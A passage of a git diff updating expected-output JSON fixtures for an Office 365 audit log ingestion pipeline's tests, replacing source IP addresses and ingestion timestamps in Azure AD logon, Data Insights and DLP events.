"5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -8970,7 +7794,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -8982,12 +7806,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051729100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970433700Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:03\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"f67568b1-64c4-4165-bdd9-16a5b9142eef\",\"InterSystemsId\":\"d960e058-1adb-4a84-a65b-1a6ce367e323\",\"IntraSystemId\":\"1dfdb693-18a1-4cff-aa3e-61feaa356100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -9026,25 +7850,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9058,7 +7864,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -9108,7 +7914,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -9120,12 +7926,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051732100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970437800Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"a8114a24-d342-4689-b75e-51e6386763de\",\"InterSystemsId\":\"e2565aaf-91b0-4ccd-8810-743123eb7383\",\"IntraSystemId\":\"21166e08-6589-4c2d-a325-c97ba45f2200\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -9164,25 +7970,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9196,7 +7984,7 @@ "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -9246,7 +8034,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -9258,12 +8046,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051734700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970442700Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"1eaf9c65-8c67-4cd9-9277-771589113752\",\"InterSystemsId\":\"ede626b9-2035-4d02-8330-201c4ae82af6\",\"IntraSystemId\":\"98612804-9aa6-40a4-b72a-808bc7742000\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -9302,25 +8090,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9334,7 +8104,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -9384,7 +8154,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -9396,12 +8166,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051737400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970447700Z", + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json index 0354164eb64..a4d621ba4f6 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565197300Z", + "ingested": "2021-12-09T13:42:28.698290600Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -72,7 +72,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565211Z", + "ingested": "2021-12-09T13:42:28.698300600Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -119,7 +119,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565214500Z", + "ingested": "2021-12-09T13:42:28.698306900Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -166,7 +166,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565217700Z", + "ingested": "2021-12-09T13:42:28.698312900Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -213,7 +213,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565220200Z", + "ingested": "2021-12-09T13:42:28.698318900Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -260,7 +260,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565222500Z", + "ingested": "2021-12-09T13:42:28.698324800Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -307,7 +307,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565225500Z", + "ingested": "2021-12-09T13:42:28.698330800Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -354,7 +354,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565228Z", + "ingested": "2021-12-09T13:42:28.698336700Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -401,7 +401,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565230700Z", + "ingested": "2021-12-09T13:42:28.698342600Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json index 990abcaf1b9..410b3afce36 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json @@ -151,7 +151,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722942900Z", + "ingested": "2021-12-09T13:42:29.292337500Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony 